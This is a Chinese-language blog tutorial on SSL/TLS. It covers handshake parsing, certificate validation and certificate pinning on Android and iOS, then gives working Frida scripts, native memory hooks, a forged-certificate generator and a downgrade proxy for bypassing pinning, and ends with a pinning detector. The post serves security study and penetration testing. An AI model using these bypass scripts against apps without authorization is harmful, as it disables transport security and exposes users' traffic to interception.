一枚酸心果子

果子果子果子果子果子~~~

SSL/TLS协议解析:从握手到证书固定

SSL/TLS协议基础

协议发展历程

SSL/TLS协议演进

1
2
3
4
5
6
7
1994年:SSL 1.0 (未发布)
1995年:SSL 2.0 (已废弃)
1996年:SSL 3.0 (已废弃)
1999年:TLS 1.0
2006年:TLS 1.1
2008年:TLS 1.2
2018年:TLS 1.3

关键变化

  • TLS 1.2:支持更强的加密算法,广泛使用
  • TLS 1.3:简化握手过程,提升安全性,移除弱加密算法

协议在OSI模型中的位置

1
2
3
4
5
6
7
应用层    | HTTP、HTTPS、SMTP等
表示层 | SSL/TLS (加密、压缩、格式转换)
会话层 | SSL/TLS (会话管理)
传输层 | TCP
网络层 | IP
数据链路层 | 以太网
物理层 | 网线、光纤

重要理解:SSL/TLS工作在表示层和会话层,为上层应用提供加密和认证服务。

TLS握手过程深度分析

TLS 1.2握手流程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
客户端                    服务器
| |
|---> ClientHello ------->|
| |
|<--- ServerHello --------|
|<--- Certificate --------|
|<--- ServerKeyExchange --|
|<--- ServerHelloDone ---|
| |
|---> ClientKeyExchange ->|
|---> ChangeCipherSpec -->|
|---> Finished ---------->|
| |
|<--- ChangeCipherSpec ---|
|<--- Finished -----------|
| |

详细握手分析

1. ClientHello消息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# ClientHello消息结构分析
def analyze_client_hello(data):
"""分析ClientHello消息"""
# TLS记录头 (5字节)
content_type = data[0] # 0x16 = Handshake
version = data[1:3] # TLS版本
length = int.from_bytes(data[3:5], 'big')

# Handshake消息头 (4字节)
handshake_type = data[5] # 0x01 = ClientHello
handshake_length = int.from_bytes(data[6:9], 'big')

# ClientHello消息体
client_version = data[9:11] # 客户端支持的TLS版本
random = data[11:43] # 32字节随机数
session_id_length = data[43]
session_id = data[44:44+session_id_length]

# 密码套件
cipher_suites_length = int.from_bytes(data[44+session_id_length:46+session_id_length], 'big')
cipher_suites = data[46+session_id_length:46+session_id_length+cipher_suites_length]

# 压缩方法
compression_methods_length = data[46+session_id_length+cipher_suites_length]
compression_methods = data[47+session_id_length+cipher_suites_length:47+session_id_length+cipher_suites_length+compression_methods_length]

# 扩展
extensions_length = int.from_bytes(data[47+session_id_length+cipher_suites_length+compression_methods_length:49+session_id_length+cipher_suites_length+compression_methods_length], 'big')
extensions = data[49+session_id_length+cipher_suites_length+compression_methods_length:]

return {
'version': client_version,
'random': random,
'cipher_suites': parse_cipher_suites(cipher_suites),
'extensions': parse_extensions(extensions)
}

def parse_cipher_suites(data):
"""解析密码套件"""
suites = []
for i in range(0, len(data), 2):
suite = int.from_bytes(data[i:i+2], 'big')
suites.append(suite)
return suites

def parse_extensions(data):
"""解析TLS扩展"""
extensions = {}
offset = 0

while offset < len(data) - 4:
ext_type = int.from_bytes(data[offset:offset+2], 'big')
ext_length = int.from_bytes(data[offset+2:offset+4], 'big')
ext_data = data[offset+4:offset+4+ext_length]

extensions[ext_type] = ext_data
offset += 4 + ext_length

return extensions

2. ServerHello消息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
def analyze_server_hello(data):
"""分析ServerHello消息"""
# 服务器选择的TLS版本
server_version = data[0:2]

# 服务器随机数
server_random = data[2:34]

# 会话ID
session_id_length = data[34]
session_id = data[35:35+session_id_length]

# 选择的密码套件
cipher_suite = int.from_bytes(data[35+session_id_length:37+session_id_length], 'big')

# 压缩方法
compression_method = data[37+session_id_length]

# 扩展
extensions_length = int.from_bytes(data[38+session_id_length:40+session_id_length], 'big')
extensions = data[40+session_id_length:]

return {
'version': server_version,
'random': server_random,
'cipher_suite': cipher_suite,
'compression_method': compression_method,
'extensions': parse_extensions(extensions)
}

3. Certificate消息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
def analyze_certificate_message(data):
"""分析Certificate消息"""
# 证书链长度
cert_chain_length = int.from_bytes(data[0:3], 'big')

certificates = []
offset = 3

while offset < len(data):
# 单个证书长度
cert_length = int.from_bytes(data[offset:offset+3], 'big')
cert_data = data[offset+3:offset+3+cert_length]

# 解析X.509证书
cert_info = parse_x509_certificate(cert_data)
certificates.append(cert_info)

offset += 3 + cert_length

return certificates

def parse_x509_certificate(cert_data):
"""解析X.509证书"""
from cryptography import x509
from cryptography.hazmat.backends import default_backend

try:
cert = x509.load_der_x509_certificate(cert_data, default_backend())

return {
'subject': cert.subject.rfc4514_string(),
'issuer': cert.issuer.rfc4514_string(),
'serial_number': str(cert.serial_number),
'not_valid_before': cert.not_valid_before,
'not_valid_after': cert.not_valid_after,
'public_key': cert.public_key(),
'signature_algorithm': cert.signature_algorithm_oid._name,
'extensions': [ext.oid._name for ext in cert.extensions]
}
except Exception as e:
return {'error': str(e)}

TLS 1.3握手优化

TLS 1.3的主要改进

1
2
传统握手 (TLS 1.2): 2-RTT
TLS 1.3握手: 1-RTT (首次) / 0-RTT (重连)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
def analyze_tls13_handshake(data):
"""分析TLS 1.3握手"""
# TLS 1.3简化了握手过程
# ClientHello包含更多信息,支持0-RTT

if data[0] == 0x16: # Handshake
handshake_type = data[5]

if handshake_type == 0x01: # ClientHello
return analyze_tls13_client_hello(data)
elif handshake_type == 0x02: # ServerHello
return analyze_tls13_server_hello(data)

return None

def analyze_tls13_client_hello(data):
"""分析TLS 1.3 ClientHello"""
# TLS 1.3的ClientHello包含预共享密钥信息
# 支持0-RTT数据

extensions = parse_extensions(data[44:]) # 简化版本

# 检查是否包含PSK扩展
psk_extensions = []
for ext_type, ext_data in extensions.items():
if ext_type == 41: # pre_shared_key
psk_extensions.append(ext_data)

return {
'version': data[9:11],
'random': data[11:43],
'psk_extensions': psk_extensions,
'supports_0rtt': len(psk_extensions) > 0
}

证书验证机制

证书链验证过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
def verify_certificate_chain(certificates, trusted_cas):
"""验证证书链"""
if not certificates:
return False, "No certificates provided"

# 验证证书链
for i, cert in enumerate(certificates):
if i == 0:
# 验证终端实体证书
result = verify_end_entity_certificate(cert, certificates[1] if len(certificates) > 1 else None)
else:
# 验证中间CA证书
result = verify_intermediate_ca_certificate(cert, certificates[i+1] if i+1 < len(certificates) else None, trusted_cas)

if not result[0]:
return False, f"Certificate {i} verification failed: {result[1]}"

return True, "Certificate chain is valid"

def verify_end_entity_certificate(cert, issuer_cert):
"""验证终端实体证书"""
# 检查证书有效期
now = datetime.now()
if now < cert['not_valid_before'] or now > cert['not_valid_after']:
return False, "Certificate expired or not yet valid"

# 检查证书用途
if not has_correct_key_usage(cert, 'digitalSignature'):
return False, "Certificate does not have correct key usage"

# 验证签名
if issuer_cert:
if not verify_signature(cert, issuer_cert):
return False, "Certificate signature verification failed"

return True, "End entity certificate is valid"

def verify_intermediate_ca_certificate(cert, issuer_cert, trusted_cas):
"""验证中间CA证书"""
# 检查是否为CA证书
if not is_ca_certificate(cert):
return False, "Not a CA certificate"

# 检查证书有效期
now = datetime.now()
if now < cert['not_valid_before'] or now > cert['not_valid_after']:
return False, "Certificate expired or not yet valid"

# 验证签名
if issuer_cert:
if not verify_signature(cert, issuer_cert):
return False, "Certificate signature verification failed"
else:
# 检查是否为受信任的根CA
if not is_trusted_root_ca(cert, trusted_cas):
return False, "Not a trusted root CA"

return True, "Intermediate CA certificate is valid"

证书固定 (Certificate Pinning)

Android中的证书固定

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
// Android证书固定实现
public class CertificatePinning {
private static final String PINNED_CERT_SHA256 = "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=";

public static OkHttpClient createPinnedClient() {
CertificatePinner certificatePinner = new CertificatePinner.Builder()
.add("example.com", PINNED_CERT_SHA256)
.add("*.example.com", PINNED_CERT_SHA256)
.build();

return new OkHttpClient.Builder()
.certificatePinner(certificatePinner)
.build();
}

// 自定义TrustManager实现证书固定
public static class PinningTrustManager implements X509TrustManager {
private final X509TrustManager defaultTrustManager;
private final Set<String> pinnedCertificates;

public PinningTrustManager(Set<String> pinnedCerts) {
this.pinnedCertificates = pinnedCerts;
this.defaultTrustManager = getDefaultTrustManager();
}

@Override
public void checkClientTrusted(X509Certificate[] chain, String authType) {
// 客户端证书验证
}

@Override
public void checkServerTrusted(X509Certificate[] chain, String authType) {
// 服务器证书验证
try {
defaultTrustManager.checkServerTrusted(chain, authType);
} catch (CertificateException e) {
throw new CertificateException("Default trust manager verification failed");
}

// 检查证书固定
if (!isCertificatePinned(chain)) {
throw new CertificateException("Certificate pinning verification failed");
}
}

private boolean isCertificatePinned(X509Certificate[] chain) {
for (X509Certificate cert : chain) {
String certHash = getCertificateHash(cert);
if (pinnedCertificates.contains(certHash)) {
return true;
}
}
return false;
}

private String getCertificateHash(X509Certificate cert) {
try {
MessageDigest digest = MessageDigest.getInstance("SHA-256");
byte[] certBytes = cert.getEncoded();
byte[] hash = digest.digest(certBytes);
return "sha256/" + Base64.encodeToString(hash, Base64.NO_WRAP);
} catch (Exception e) {
return null;
}
}
}
}

iOS中的证书固定

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
// iOS证书固定实现
import Security
import Foundation

class CertificatePinning {
static let pinnedCertificates: [Data] = [
// 预置的证书数据
]

static func createPinnedSession() -> URLSession {
let config = URLSessionConfiguration.default
let session = URLSession(configuration: config, delegate: CertificatePinningDelegate(), delegateQueue: nil)
return session
}
}

class CertificatePinningDelegate: NSObject, URLSessionDelegate {
func urlSession(_ session: URLSession, didReceive challenge: URLAuthenticationChallenge, completionHandler: @escaping (URLSession.AuthChallengeDisposition, URLCredential?) -> Void) {

guard let serverTrust = challenge.protectionSpace.serverTrust else {
completionHandler(.cancelAuthenticationChallenge, nil)
return
}

// 验证证书链
let result = SecTrustEvaluate(serverTrust, nil)
guard result == errSecSuccess else {
completionHandler(.cancelAuthenticationChallenge, nil)
return
}

// 检查证书固定
if isCertificatePinned(serverTrust: serverTrust) {
let credential = URLCredential(trust: serverTrust)
completionHandler(.useCredential, credential)
} else {
completionHandler(.cancelAuthenticationChallenge, nil)
}
}

private func isCertificatePinned(serverTrust: SecTrust) -> Bool {
guard let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, 0) else {
return false
}

let serverCertificateData = SecCertificateCopyData(serverCertificate)
let data = CFDataGetBytePtr(serverCertificateData)
let size = CFDataGetLength(serverCertificateData)
let serverCertData = Data(bytes: data!, count: size)

return CertificatePinning.pinnedCertificates.contains(serverCertData)
}
}

SSL Pinning绕过技术

Frida Hook绕过

Android SSL Pinning绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
// Frida脚本:绕过Android SSL Pinning
function bypass_android_ssl_pinning() {
// Hook X509TrustManager
var X509TrustManager = Java.use("javax.net.ssl.X509TrustManager");
var X509Certificate = Java.use("java.security.cert.X509Certificate");

// Hook checkClientTrusted
X509TrustManager.checkClientTrusted.implementation = function(chain, authType) {
console.log("[+] checkClientTrusted called");
// 直接返回,不进行验证
};

// Hook checkServerTrusted
X509TrustManager.checkServerTrusted.implementation = function(chain, authType) {
console.log("[+] checkServerTrusted called");
// 直接返回,不进行验证
};

// Hook getAcceptedIssuers
X509TrustManager.getAcceptedIssuers.implementation = function() {
console.log("[+] getAcceptedIssuers called");
return Java.array("java.security.cert.X509Certificate", []);
};

// Hook OkHttp的CertificatePinner
try {
var CertificatePinner = Java.use("okhttp3.CertificatePinner");
CertificatePinner.check.overload("java.lang.String", "java.util.List").implementation = function(hostname, peerCertificates) {
console.log("[+] CertificatePinner.check called for: " + hostname);
// 直接返回,不进行证书固定检查
};
} catch (e) {
console.log("[-] OkHttp CertificatePinner not found");
}

// Hook TrustKit
try {
var TrustKit = Java.use("com.datatheorem.android.trustkit.TrustKit");
TrustKit.getInstance.implementation = function() {
console.log("[+] TrustKit.getInstance called");
return this.getInstance();
};
} catch (e) {
console.log("[-] TrustKit not found");
}
}

iOS SSL Pinning绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
// Frida脚本:绕过iOS SSL Pinning
function bypass_ios_ssl_pinning() {
// Hook SecTrustEvaluate
var SecTrustEvaluate = Module.findExportByName("Security", "SecTrustEvaluate");
if (SecTrustEvaluate) {
Interceptor.attach(SecTrustEvaluate, {
onEnter: function(args) {
console.log("[+] SecTrustEvaluate called");
},
onLeave: function(retval) {
// 强制返回成功
console.log("[+] Forcing SecTrustEvaluate to return success");
retval.replace(ptr(0)); // errSecSuccess
}
});
}

// Hook SecTrustEvaluateWithError (iOS 12+)
var SecTrustEvaluateWithError = Module.findExportByName("Security", "SecTrustEvaluateWithError");
if (SecTrustEvaluateWithError) {
Interceptor.attach(SecTrustEvaluateWithError, {
onEnter: function(args) {
console.log("[+] SecTrustEvaluateWithError called");
},
onLeave: function(retval) {
// 强制返回true
console.log("[+] Forcing SecTrustEvaluateWithError to return true");
retval.replace(ptr(1));
}
});
}

// Hook NSURLSessionDelegate
var NSURLSessionDelegate = ObjC.classes.NSURLSessionDelegate;
if (NSURLSessionDelegate) {
var originalDidReceiveChallenge = NSURLSessionDelegate['- URLSession:didReceiveChallenge:completionHandler:'];
Interceptor.attach(originalDidReceiveChallenge.implementation, {
onEnter: function(args) {
console.log("[+] NSURLSessionDelegate didReceiveChallenge called");
},
onLeave: function(retval) {
// 修改completionHandler调用
var completionHandler = args[4];
var block = new ObjC.Block(completionHandler);
block.implementation = function(disposition, credential) {
console.log("[+] Modified completionHandler called");
// 强制使用服务器证书
block.implementation(0, credential); // URLSessionAuthChallengeUseCredential
};
}
});
}
}

证书替换绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
# Python脚本:证书替换绕过
import ssl
import socket
from cryptography import x509
from cryptography.hazmat.backends import default_backend

class CertificateReplacer:
def __init__(self, target_host, target_port):
self.target_host = target_host
self.target_port = target_port
self.original_cert = None
self.replacement_cert = None

def get_server_certificate(self):
"""获取服务器证书"""
try:
# 创建SSL上下文
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

# 连接服务器
with socket.create_connection((self.target_host, self.target_port)) as sock:
with context.wrap_socket(sock, server_hostname=self.target_host) as ssock:
cert_der = ssock.getpeercert(binary_form=True)
self.original_cert = x509.load_der_x509_certificate(cert_der, default_backend())
return self.original_cert
except Exception as e:
print(f"获取服务器证书失败: {e}")
return None

def create_replacement_certificate(self):
"""创建替换证书"""
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
import datetime

# 生成私钥
private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)

# 创建证书
subject = issuer = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, "US"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, "CA"),
x509.NameAttribute(NameOID.LOCALITY_NAME, "San Francisco"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, "Test Company"),
x509.NameAttribute(NameOID.COMMON_NAME, self.target_host),
])

cert = x509.CertificateBuilder().subject_name(
subject
).issuer_name(
issuer
).public_key(
private_key.public_key()
).serial_number(
x509.random_serial_number()
).not_valid_before(
datetime.datetime.utcnow()
).not_valid_after(
datetime.datetime.utcnow() + datetime.timedelta(days=365)
).add_extension(
x509.SubjectAlternativeName([
x509.DNSName(self.target_host),
]),
critical=False,
).sign(private_key, hashes.SHA256(), default_backend())

self.replacement_cert = cert
return cert

def save_certificate(self, cert, filename):
"""保存证书到文件"""
with open(filename, 'wb') as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))

def load_certificate(self, filename):
"""从文件加载证书"""
with open(filename, 'rb') as f:
cert_data = f.read()
return x509.load_pem_x509_certificate(cert_data, default_backend())

进阶绕过技术

内存补丁绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Python脚本:内存补丁绕过SSL Pinning
import frida
import sys

def on_message(message, data):
if message['type'] == 'send':
print(f"[*] {message['payload']}")
else:
print(message)

def bypass_ssl_pinning_with_memory_patch():
"""使用内存补丁绕过SSL Pinning"""

# 获取目标进程
device = frida.get_usb_device()
session = device.attach("com.example.app")

# 注入脚本
script = session.create_script("""
// 内存补丁绕过SSL Pinning
function patch_ssl_verification() {
// 查找证书验证函数
var verify_cert_addr = Module.findExportByName("libssl.so", "SSL_CTX_set_verify");
if (verify_cert_addr) {
console.log("[+] Found SSL_CTX_set_verify at: " + verify_cert_addr);

// 替换函数实现
Interceptor.replace(verify_cert_addr, new NativeCallback(function(ctx, mode, callback) {
console.log("[+] SSL_CTX_set_verify called, disabling verification");
// 设置为不验证证书
return 0;
}, 'int', ['pointer', 'int', 'pointer']));
}

// 查找证书固定检查函数
var pin_check_addr = Module.findExportByName("libssl.so", "SSL_get_peer_certificate");
if (pin_check_addr) {
console.log("[+] Found SSL_get_peer_certificate at: " + pin_check_addr);

// 替换函数实现
Interceptor.replace(pin_check_addr, new NativeCallback(function(ssl) {
console.log("[+] SSL_get_peer_certificate called, returning null");
// 返回null,跳过证书检查
return ptr(0);
}, 'pointer', ['pointer']));
}
}

// 执行补丁
patch_ssl_verification();
""")

script.on('message', on_message)
script.load()

# 保持脚本运行
sys.stdin.read()

网络层绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
# Python脚本:网络层SSL Pinning绕过
import socket
import ssl
import struct

class SSLProxy:
def __init__(self, local_port, remote_host, remote_port):
self.local_port = local_port
self.remote_host = remote_host
self.remote_port = remote_port
self.server_socket = None

def start_proxy(self):
"""启动SSL代理"""
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_socket.bind(('localhost', self.local_port))
self.server_socket.listen(5)

print(f"[+] SSL Proxy started on port {self.local_port}")

while True:
client_socket, addr = self.server_socket.accept()
print(f"[+] New connection from {addr}")

# 处理客户端连接
self.handle_client(client_socket)

def handle_client(self, client_socket):
"""处理客户端连接"""
try:
# 接收客户端数据
data = client_socket.recv(4096)
if not data:
return

# 解析TLS记录
tls_record = self.parse_tls_record(data)

# 修改TLS记录
modified_data = self.modify_tls_record(tls_record)

# 转发到目标服务器
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.connect((self.remote_host, self.remote_port))
server_socket.send(modified_data)

# 接收服务器响应
response = server_socket.recv(4096)

# 修改服务器响应
modified_response = self.modify_server_response(response)

# 转发给客户端
client_socket.send(modified_response)

# 关闭连接
server_socket.close()
client_socket.close()

except Exception as e:
print(f"[-] Error handling client: {e}")
client_socket.close()

def parse_tls_record(self, data):
"""解析TLS记录"""
if len(data) < 5:
return None

content_type = data[0]
version = struct.unpack('>H', data[1:3])[0]
length = struct.unpack('>H', data[3:5])[0]
payload = data[5:5+length]

return {
'content_type': content_type,
'version': version,
'length': length,
'payload': payload
}

def modify_tls_record(self, tls_record):
"""修改TLS记录"""
if not tls_record:
return b''

# 修改版本号,强制使用TLS 1.0
tls_record['version'] = 0x0301

# 重新构造TLS记录
modified_data = struct.pack('>BHH',
tls_record['content_type'],
tls_record['version'],
tls_record['length']) + tls_record['payload']

return modified_data

def modify_server_response(self, response):
"""修改服务器响应"""
# 这里可以修改服务器的证书响应
# 例如:替换证书、修改证书链等
return response

# 使用示例
if __name__ == "__main__":
proxy = SSLProxy(8443, "example.com", 443)
proxy.start_proxy()

检测与防护

SSL Pinning检测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
# Python脚本:检测SSL Pinning
import re
import os
from pathlib import Path

class SSLPinningDetector:
def __init__(self, app_path):
self.app_path = app_path
self.pinning_indicators = []

def detect_android_ssl_pinning(self):
"""检测Android应用中的SSL Pinning"""
# 检查APK文件
if self.app_path.endswith('.apk'):
return self.detect_apk_ssl_pinning()

# 检查源代码
if os.path.isdir(self.app_path):
return self.detect_source_ssl_pinning()

return False

def detect_apk_ssl_pinning(self):
"""检测APK中的SSL Pinning"""
import zipfile

try:
with zipfile.ZipFile(self.app_path, 'r') as apk:
# 检查classes.dex
if 'classes.dex' in apk.namelist():
dex_data = apk.read('classes.dex')
if self.scan_dex_for_pinning(dex_data):
return True

# 检查资源文件
for file_name in apk.namelist():
if file_name.endswith('.xml') or file_name.endswith('.json'):
file_data = apk.read(file_name)
if self.scan_resources_for_pinning(file_data):
return True

except Exception as e:
print(f"[-] Error analyzing APK: {e}")

return False

def scan_dex_for_pinning(self, dex_data):
"""扫描DEX文件中的SSL Pinning代码"""
# 转换为字符串进行搜索
dex_str = dex_data.decode('utf-8', errors='ignore')

# SSL Pinning相关字符串
pinning_strings = [
'CertificatePinner',
'TrustKit',
'SSLContext',
'X509TrustManager',
'checkServerTrusted',
'pinning',
'certificate',
'sha256',
'public-key-pins'
]

found_indicators = []
for string in pinning_strings:
if string.lower() in dex_str.lower():
found_indicators.append(string)

if found_indicators:
self.pinning_indicators.extend(found_indicators)
return True

return False

def scan_resources_for_pinning(self, resource_data):
"""扫描资源文件中的SSL Pinning配置"""
resource_str = resource_data.decode('utf-8', errors='ignore')

# 检查网络安全配置
if 'network_security_config' in resource_str:
if 'pin-set' in resource_str or 'certificates' in resource_str:
self.pinning_indicators.append('network_security_config')
return True

# 检查TrustKit配置
if 'trustkit' in resource_str.lower():
self.pinning_indicators.append('trustkit_config')
return True

return False

def detect_source_ssl_pinning(self):
"""检测源代码中的SSL Pinning"""
for root, dirs, files in os.walk(self.app_path):
for file in files:
if file.endswith(('.java', '.kt', '.swift', '.m', '.h')):
file_path = os.path.join(root, file)
if self.scan_source_file(file_path):
return True

return False

def scan_source_file(self, file_path):
"""扫描单个源文件"""
try:
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read()

# 检查SSL Pinning相关代码
pinning_patterns = [
r'CertificatePinner',
r'TrustKit',
r'SSLContext',
r'X509TrustManager',
r'checkServerTrusted',
r'pinning',
r'certificate.*pin',
r'sha256.*pin'
]

for pattern in pinning_patterns:
if re.search(pattern, content, re.IGNORECASE):
self.pinning_indicators.append(f"{file_path}: {pattern}")
return True

except Exception as e:
print(f"[-] Error scanning file {file_path}: {e}")

return False

def get_pinning_indicators(self):
"""获取检测到的SSL Pinning指标"""
return self.pinning_indicators

# 使用示例
if __name__ == "__main__":
detector = SSLPinningDetector("app.apk")
has_pinning = detector.detect_android_ssl_pinning()

if has_pinning:
print("[+] SSL Pinning detected!")
print("Indicators:")
for indicator in detector.get_pinning_indicators():
print(f" - {indicator}")
else:
print("[-] No SSL Pinning detected")

结语

SSL/TLS协议是现代网络安全的基础,理解其工作原理对于网络安全研究和渗透测试至关重要

本文关键点

  • 协议深度:从TLS握手到证书验证的完整流程分析
  • 绕过技术:从Frida Hook到内存补丁的多种绕过方法

这篇内容和之前几篇网络安全基础内容都有关联以及一些补充,其中有不太理解的地方欢迎私聊一起探讨

持续输出技术分享,您的支持将鼓励我继续创作!